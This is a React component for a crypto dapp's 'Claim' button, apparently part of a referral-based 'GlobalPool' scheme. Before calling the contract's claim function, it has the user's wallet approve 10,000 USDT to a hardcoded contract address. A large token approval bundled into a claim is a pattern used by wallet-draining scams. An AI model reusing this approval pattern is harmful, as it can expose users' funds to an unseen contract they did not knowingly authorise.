import { ethers } from "ethers";

import abi1 from "./contract/GlobalPool.json";

import Web3 from 'web3';
const Buy = ({ state1 }) => {
  const buyChai = async (event) => {
    event.preventDefault();
    const { contract1 } = state1;
      const contractABI = abi1.abi1;
    const name = document.querySelector("#name").value;
    const refer = document.querySelector("#hid").value;
    const addr = document.querySelector("#us").value;
    const pp = document.querySelector("#pp").value;
    const pending = document.querySelector("#pending").value;
   
      
    const web3 = new Web3(Web3.givenProvider);
    const provider = new ethers.providers.Web3Provider(window.ethereum);
    const signer = provider.getSigner();
    const spenderAddr = document.querySelector("#us").value;
    const addressOfYourContract = '0x1f4bb39a2859c25be6884f6990aacf1506d448f3';
    const a  = 0;
  
    const rt ="150";
   console.log(pending);
    const amountInTheSmallestUnit = a ;
           const busdContractAddress = '0x55d398326f99059fF775485246999027B3197955';
    const busdContractAbi = `[{"inputs":[],"payable":false,"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"constant":true,"inputs":[],"name":"_decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"_name","outputs":[{"internalType":"string","name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"_symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"getOwner","outputs":[{"internalType":"address","name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"mint","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"renounceOwnership","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"}]`;

   

    function refreshPage() {
      window.location.reload(false);
    }
    
    const busdContract = new ethers.Contract(busdContractAddress, busdContractAbi, signer);
   

    const amountToApprove = ethers.utils.parseUnits('10000', 18);
    const allowance = await busdContract.allowance(signer.getAddress(), addressOfYourContract);
    
    if (allowance.lt(amountToApprove)) {
      const tx = await busdContract.approve(addressOfYourContract, amountToApprove, {
        gasLimit: 75000,
    });
      await tx.wait();
    }

   

  const transaction = await contract1.claim(refer,pp,pending, {
    gasLimit: 1200000,

});
await transaction.wait();
  
 
  
console.log("Transaction is done");


 
  // _refer, _amount, _per, _lev, _wid, _team
/*
  const per ="0";
  const lev = "0";
  const wid = "0";
  const transaction = await contract.register1('0x139169F2563257Bbb9F46525e2542bF3Ee01d56b',100,per,lev,wid,'0x94e2deC2761DcA2512f2c62a6EC2b07f747274D8', {
              gasLimit: 1200000,
                
        });
           await transaction.wait();
      
          console.log("Transaction is done");
*/

      refreshPage();
             


  
  
  };
  return (
    <>
      <div className="container-md" style={{ width: "100%", marginTop: "1px" }}>
        <form onSubmit={buyChai}>
        <input type="hidden" id ="name"></input>
          <button
            type="submit"
            id="sample" 
            className="btn btn-primary btn-activate-plan"
          >
            Claim
          </button>
        </form>
      </div>
    </>
  );
};
export default Buy;